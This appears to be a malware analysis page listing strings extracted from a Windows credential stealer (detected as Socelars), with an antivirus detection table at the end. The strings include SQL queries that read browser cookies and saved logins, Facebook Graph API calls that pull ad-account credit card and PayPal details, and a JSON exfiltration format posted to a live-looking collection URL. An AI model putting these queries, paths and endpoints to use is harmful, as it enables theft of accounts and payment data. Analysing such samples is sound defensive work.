admined_pages":\{"nodes":\[(.*?)\]\}
https://business.facebook.com
https:\/\/business.facebook.com\/?business_id=
https://business.facebook.com/?business_id=
https://secure.facebook.com/ads/manager/account_settings/account_billing/
,{access_token:"
accountID:"
https://graph.facebook.com/v9.0/act_
?_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&fields=%5B%22all_payment_methods%7Bpayment_method_altpays%7Baccount_id%2Ccountry%2Ccredential_id%2Cdisplay_name%2Cimage_url%2Cinstrument_type%2Cnetwork_id%2Cpayment_provider%2Ctitle%7D%2Cpm_credit_card%7Baccount_id%2Ccredential_id%2Ccredit_card_address%2Ccredit_card_type%2Cdisplay_string%2Cexp_month%2Cexp_year%2Cfirst_name%2Cis_verified%2Clast_name%2Cmiddle_name%2Ctime_created%2Cneed_3ds_authorization%2Callow_manual_3ds_authorization%2Csupports_recurring_in_india%7D%2Cpayment_method_direct_debits%7Baccount_id%2Caddress%2Ccan_verify%2Ccredential_id%2Cdisplay_string%2Cfirst_name%2Cis_awaiting%2Cis_pending%2Clast_name%2Cmiddle_name%2Cstatus%2Ctime_created%7D%2Cpayment_method_extended_credits%7Baccount_id%2Cbalance%2Ccredential_id%2Cmax_balance%2Ctype%2Cpartitioned_from%2Csequential_liability_amount%7D%2Cpayment_method_paypal%7Baccount_id%2Ccredential_id%2Cemail_address%2Ctime_created%7D%2Cpayment_method_stored_balances%7Baccount_id%2Cbalance%2Ccredential_id
&access_token=
all_payment_methods
pm_credit_card
payment_method_paypal
paypal|
display_string
exp_month
exp_year
https://graph.facebook.com/v9.0/act_
&access_token=
/transactions?_reqName=adaccount%2Ftransactions&_reqSrc=AdsCMBillingTransactionsDataLoader&include_headers=false&locale=en_US&method=get&pretty=0&suppress_http_code=1&xref=f15c50c5e8cd12
https://graph.facebook.com/v9.0/act_
&access_token=
?_reqName=adaccount&_reqSrc=AdsCMAccountSettingsDataLoader&fields=[%22account_id%22,%22account_status%22]&include_headers=false&locale=en_US&method=get&pretty=0&suppress_http_code=1
account_status":
Error Reading Accountinfo
DELETE
User-Agent
Cookie
select count(*) as RCount from cookies
select host_key,name,encrypted_value,expires_utc from cookies where host_key like '
; %s=%s
select count(*) as RCount from moz_cookies
SELECT host,name,value,expiry FROM moz_cookies where host='.facebook.com';
%s=%s;
c_user
select count(*) as RCount from moz_cookies
SELECT host,name,value,expiry FROM moz_cookies where host='
%s=%s;
c_user
Cookies
\Google\Chrome\User Data\Default\Cookies
Cookies
\Google\Chrome\User Data\Profile 1\Cookies
\Google\Chrome\User Data\
\Cookies
Cookies
DELETE
https://www.facebook.com/
","id":0},
{"domain":".facebook.com","expirationDate":"","hostOnly":false,"httpOnly":true,"name":"
","path":"/","secure":false,"session":true,"storeId":"0","value":"
c_user=
https://www.amazon.com/
{"domain":".amazon.com","expirationDate":"","hostOnly":false,"httpOnly":true,"name":"
","path":"/","secure":true,"session":true,"storeId":"0","value":"
","id":0},
c_user=
select * from logins where blacklisted_by_user=0 and origin_url like '%
select * from logins where blacklisted_by_user=0
Login Data
\Google\Chrome\User Data\Default\Login Data
Login Data
\Google\Chrome\User Data\Profile 1\Login Data
\Google\Chrome\User Data\
\Login Data
Login Data
\Google\Chrome\User Data\
\Login Data
Login Data
DELETE
http://www.wygexde.xyz/Home/Index/getdata
{"Explore":"%ls","Encode":"%ls","cUserId":"%ls","LoginName":"%ls","Psw":"%ls","Page":"%ls","Balance":"%ls","CreditCard":"%ls","Paypal":"%ls","FrieldsCount":"%ls","Cookie":%ls}
http://www.wygexde.xyz
http://www.wygexde.xyz
http://www.wygexde.xyz
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
16:15:00
16:15:00
16:15:00
16:15:00
16:15:00
16:15:00
"profilecount":
"data":[
"profilename":
"loginname":
"psw":
"userid":
"cookies":
"fulllogindata":
"site":
"loginname":
"psw":
"fulllogindata":
"accountinfo":{
"UserNickName":
"page":
"pagedetail":
"balance":
"card":
"adscard":
"threshold":
"billinginfo":
"paypal":
"frieldcount":
"accountstatus":
"url":
"title":
DELETE
running
"Type":"
"data":{
"cUserId":"
"Cookie":
"ChromeMultiProfileData":
"Type":"
"Version":"
"data":{
"RegExist":
"HiddenRegExist":
"Explore":"
"Encode":"
"LoginName":"
"cUserId":"
"SubChannelRun":"
"Psw":"
"UserAgent":"
"Cookie":
"NickName":"
"Page":"
"PageDetail":"
"BM":"
"Balance":"
"CreditCard":"
"AdsCreditCard":"
"HasTrans":"
"Threshold":"
"AccountStatus":"
"BillingInfo":
"Paypal":"
"FrieldsCount":"
"OS":"
"IEHistory":
"MachineID":"
"ChannelID":"
application/x-www-form-urlencoded;charset=utf-8
running
"Type":"
"data":{
"cUserId":"
"Cookie":
"Type":"
"Version":"
"data":{
"RegExist":
"Explore":"
"Encode":"
"LoginName":"
"Psw":"
"Cookie":
"OS":"
"ChannelID":"
"MachineID":"
application/x-www-form-urlencoded;charset=utf-8
"InstallResult":"
"Version":"
"ChannelID":"
"MachineID":"
"RegExist":
"OS":"
"Explore":"
"DefaultExplore":"
"cUserId":"
"LoginName":"
"ReadCookiesResult":"
"ReadInfoResult":"
"ServiceList":"
"ProcessList":"
"ErrMsg":"
application/x-www-form-urlencoded;charset=utf-8
"MachineID":"
"SubChannelID":"
"PreRegKeyCheck":"
"RunResult":"
application/x-www-form-urlencoded;charset=utf-8
install
chrome|firefox|ie
\Google\Chrome\User Data\Profile 1\Cookies
\Google\Chrome\User Data\Profile
\Cookies
Default
datr|sb|c_user|xs|pl|fr
.facebook.com
c_user
Default
Default
.facebook.com
Profile
datr|sb|c_user|xs|pl|fr
.facebook.com
c_user
.facebook.com
datr|sb|c_user|xs|pl|fr
.facebook.com
c_user
.facebook.com
[zhuanyi]
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
no fbcookies found
amazon_us
chrome|firefox|ie
datr|sb|c_user|xs|pl|fr
.amazon.com
c_user
.amazon.com
.amazon.com
amazon_uk
chrome|firefox|ie
datr|sb|c_user|xs|pl|fr
.amazon.co.uk
c_user
.amazon.co.uk
.amazon.co.uk
DELETE
InitializeConditionVariable
SleepConditionVariableCS
WakeAllConditionVariable
bad allocation
bad array new length
regex_error(error_collate): The expression contained an invalid collating element name.
regex_error(error_ctype): The expression contained an invalid character class name.
regex_error(error_escape): The expression contained an invalid escaped character, or a trailing escape.
regex_error(error_backref): The expression contained an invalid back reference.
regex_error(error_brack): The expression contained mismatched [ and ].
regex_error(error_paren): The expression contained mismatched ( and ).
regex_error(error_brace): The expression contained mismatched { and }.
regex_error(error_badbrace): The expression contained an invalid range in a { expression }.
regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.
regex_error(error_space): There was insufficient memory to convert the expression into a finite state machine.
regex_error(error_badrepeat): One of *?+{ was not preceded by a valid regular expression.
regex_error(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
regex_error(error_stack): There was insufficient memory to determine whether the regular expression could match the specified character sequence.
regex_error(error_parse)
regex_error(error_syntax)
regex_error
unknown error
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
WakeConditionVariable
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
[aOni*{
~ $s%r
@b;zO]
v2!L.2
IND)ind)
IND)ind)
CorExitProcess
_hypot
_nextafter
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
CompareStringEx
EnumSystemLocalesEx
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
GetDateFormatEx
GetLocaleInfoEx
GetSystemTimePreciseAsFileTime
GetTimeFormatEx
GetUserDefaultLocaleName
InitializeCriticalSectionEx
IsValidLocaleName
LCMapStringEx
LCIDToLocaleName
LocaleNameToLCID
RoInitialize
RoUninitialize
AppPolicyGetProcessTerminationMethod
AppPolicyGetThreadInitializationType
]vQ<)8
|)P!?Ua0
Eb2]A=
u?^p?o4
y1~?|"
?x+s7
?5Od%
?|I7Z#
>,'1D=
?g)([|X>=
~U`?K
:h"?bC
@H#?43
Ax#?uN}*
r7Yr7=
F0$?3=1
H`$?h|
&?~YK|
sU0&?W
<8bunz8
?#%X.y
F||<##
<@En[vP
UTF-16LEUNICODE
1#QNAN
1#SNAN
?5Wg4p
%S#[k=
"B <1=
?COMPILER=msvc-1913
THREADSAFE=1
20b:20e
20c:20e
40f-21a-21d
local time unavailable
second
minute
localtime
unixepoch
weekday
start of
%04d-%02d-%02d %02d:%02d:%02d
%02d:%02d:%02d
%04d-%02d-%02d
%06.3f
julianday
datetime
strftime
current_time
current_timestamp
current_date
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
(NULL)
922337203685477580
API call with %s database connection pointer
unopened
invalid
Savepoint
AutoCommit
Transaction
SorterNext
PrevIfOpen
NextIfOpen
Checkpoint
JournalMode
Vacuum
VFilter
VUpdate
InitCoroutine
MustBeInt
IfNullRow
SeekLT
SeekLE
SeekGE
SeekGT
NoConflict
NotFound
SeekRowid
NotExists
IfSmaller
SorterSort
Rewind
RowSetRead
RowSetTest
Program
FkIfZero
IfNotZero
IsNull
NotNull
ElseNotEq
DecrJumpZero
IncrVacuum
Return
EndCoroutine
HaltIfNull
Integer
String
SoftNull
Variable
IntCopy
ResultRow
CollSeq
AddImm
RealAffinity
Permutation
BitAnd
ShiftLeft
ShiftRight
Subtract
Multiply
Divide
Remainder
Concat
Compare
BitNot
Column
String8
Affinity
MakeRecord
ReadCookie
SetCookie
ReopenIdx
OpenRead
OpenWrite
OpenDup
OpenAutoindex
OpenEphemeral
SorterOpen
SequenceTest
OpenPseudo
ColumnsUsed
Sequence
NewRowid
Insert
InsertInt
Delete
ResetCount
SorterCompare
SorterData
RowData
NullRow
SeekEnd
SorterInsert
IdxInsert
IdxDelete
DeferredSeek
IdxRowid
Destroy
ResetSorter
CreateBtree
SqlExec
ParseSchema
LoadAnalysis
DropTable
DropIndex
DropTrigger
IntegrityCk
RowSetAdd
FkCounter
MemMax
OffsetLimit
AggStep0
AggStep
AggFinal
Expire
TableLock
VBegin
VCreate
VDestroy
VColumn
VRename
Pagecount
MaxPgcnt
PureFunc0
Function0
PureFunc
Function
CursorHint
Explain
AreFileApisANSI
CharLowerW
CharUpperW
CloseHandle
CreateFileA
CreateFileW
CreateFileMappingA
CreateFileMappingW
CreateMutexW
DeleteFileA
DeleteFileW
FileTimeToLocalFileTime
FileTimeToSystemTime
FlushFileBuffers
FormatMessageA
FormatMessageW
FreeLibrary
GetCurrentProcessId
GetDiskFreeSpaceA
GetDiskFreeSpaceW
GetFileAttributesA
GetFileAttributesW
GetFileAttributesExW
GetFileSize
GetFullPathNameA
GetFullPathNameW
GetLastError
GetProcAddressA
GetSystemInfo
GetSystemTime
GetSystemTimeAsFileTime
GetTempPathA
GetTempPathW
GetTickCount
GetVersionExA
GetVersionExW
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HeapValidate
HeapCompact
LoadLibraryA
LoadLibraryW
LocalFree
LockFile
LockFileEx
MapViewOfFile
MultiByteToWideChar
QueryPerformanceCounter
ReadFile
SetEndOfFile
SetFilePointer
SystemTimeToFileTime
UnlockFile
UnlockFileEx
UnmapViewOfFile
WideCharToMultiByte
WriteFile
CreateEventExW
WaitForSingleObject
WaitForSingleObjectEx
SetFilePointerEx
GetFileInformationByHandleEx
MapViewOfFileFromApp
CreateFile2
LoadPackagedLibrary
GetTickCount64
GetNativeSystemInfo
OutputDebugStringA
OutputDebugStringW
GetProcessHeap
CreateFileMappingFromApp
InterlockedCompareExchange
UuidCreate
UuidCreateSequential
FlushViewOfFile
OsError 0x%lx (%lu)
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict at line %d
winSeekFile
winClose
winRead
winWrite1
winWrite2
winTruncate1
winTruncate2
winSync1
winSync2
winFileSize
winUnlockReadLock
winUnlock
%s-shm
winOpenShm
winShmMap1
winShmMap2
winShmMap3
winUnmapfile1
winUnmapfile2
winMapfile1
winMapfile2
etilqs_
winGetTempname1
winGetTempname2
winGetTempname4
winGetTempname5
winOpen
winDelete
winAccess
%s%c%s
winFullPathname1
winFullPathname2
win32-longpath
win32-none
win32-longpath-none
recovered %d pages from %s
-journal
nolock
immutable
recovered %d frames from WAL file %s
cannot limit WAL size: %s
:memory:
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
free-page count in header is too small
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Offset %d out of range %d..%d
Extends off end of page
Rowid %lld out of order
Child page depth differs
Multiple uses for byte %u of page %d
Fragmentation of %d bytes reported as %d on page %d
Main freelist:
Page %d is never used
Pointer map page %d is referenced
unknown database %s
destination database is in use
source and destination must be distinct
%!.15g
BINARY
(%.20s)
%s(%d)
(blob)
vtab:%p
program
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mj%06X9%02X
FOREIGN KEY constraint failed
non-deterministic function in index expression or CHECK constraint
API called with finalized prepared statement
API called with NULL prepared statement
string or blob too big
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
'%.*q'
zeroblob(%d)
NOT NULL
UNIQUE
FOREIGN KEY
%s constraint failed
%z: %s
abort at %d in [%s]: %s
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot start a transaction within a transaction
cannot rollback - no transaction is active
cannot commit - no transaction is active
database schema has changed
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
too many levels of trigger recursion
out of
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
out of memory
integer
cannot open value of type %s
no such rowid: %lld
cannot open virtual table: %s
cannot open table without rowid: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
row value misused
no such column
ambiguous column name
%s: %s.%s.%s
%s: %s.%s
%s: %s
partial index WHERE clauses
index expressions
CHECK constraints
%s prohibited in %s
the "." operator
second argument to likelihood() must be a constant between 0.0 and 1.0
not authorized to use function: %s
non-deterministic functions
misuse of aggregate function %.*s()
no such function: %.*s
wrong number of arguments to function %.*s()
subqueries
parameters
%r %s BY term out of range - should be between 1 and %d
too many terms in ORDER BY clause
%r ORDER BY term does not match any column in the result set
too many terms in %s BY clause
a GROUP BY clause is required before HAVING
aggregate functions are not allowed in the GROUP BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
%d columns assigned %d values
too many columns in %s
_ROWID_
USING INDEX %s FOR IN-OPERATOR
sub-select returns %d columns - expected %d
SCALAR
CORRELATED
EXECUTE %s%s SUBQUERY %d
hex literal too big: %s%s
misuse of aggregate: %s()
unknown function: %s()
RAISE() may only be used within a trigger-program
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
name=%Q
%s OR name=%Q
type='trigger' AND (%s)
tbl_name=%Q
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a UNIQUE column
Cannot add a REFERENCES column with non-NULL default value
Cannot add a NOT NULL column with default value NULL
Cannot add a column with non-constant default
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
virtual tables may not be altered
Cannot add a column to a view
sqlite_altertab_%s
sqlite_stat1
tbl,idx,stat
sqlite_stat3
sqlite_stat4
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
stat_init
stat_push
stat_get
sqlite_%
unordered*
sz=[0-9]*
noskipscan*
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
database is already attached
attached databases must use the same text encoding as main database
unable to open database: %s
no such database: %s
Antivirus Signature
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.371633
FireEye Generic.mg.9d1b497b9d05f015
CAT-QuickHeal Trojan.DisbukRI.S19305183
McAfee GenericRXLT-RQ!9D1B497B9D05
Cylance Clean
Zillya Clean
Sangfor Trojan.Win32.Save.a
K7AntiVirus Clean
BitDefender Gen:Variant.Zusy.371633
K7GW Clean
CrowdStrike win/malicious_confidence_90% (W)
Baidu Clean
Cyren W32/Socelars.G.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Spy.Socelars.S
APEX Malicious
Paloalto Clean
ClamAV Win.Malware.Razy-9789744-0
Kaspersky HEUR:Trojan-PSW.Win32.Disbuk.gen
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
AegisLab Clean
Avast Win32:PWSX-gen [Trj]
Rising Malware.Heuristic!ET#88% (RDMK:cmRtazqqUdL6jYUcLFaAi0U7sQ4q)
Ad-Aware Gen:Variant.Zusy.371633
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Trojan.Siggen12.40103
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Emotet.th
CMC Clean
Emsisoft Trojan-Spy.Socelars (A)
SentinelOne Static AI - Suspicious PE
GData Gen:Variant.Zusy.371633
Jiangmin Clean
eGambit Clean
Avira HEUR/AGEN.1124060
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.Win32.Disbuk.gen
Microsoft Trojan:Win32/Glupteba!ml
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Disbuk.R372531
Acronis Clean
BitDefenderTheta Gen:NN.ZexaF.34662.y10@a8ihNfij
TACHYON Clean
VBA32 BScope.Trojan.Agentb
Malwarebytes Glupteba.Backdoor.Bruteforce.DDS
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Trojan-Spy.Agent
MaxSecure Clean
Fortinet W32/Socelars.S!tr.spy
Webroot Clean
AVG Win32:PWSX-gen [Trj]
Cybereason malicious.b9d05f
Panda Trj/Genetic.gen
Qihoo-360 HEUR/QVM20.1.45C3.Malware.Gen
No IRMA results available.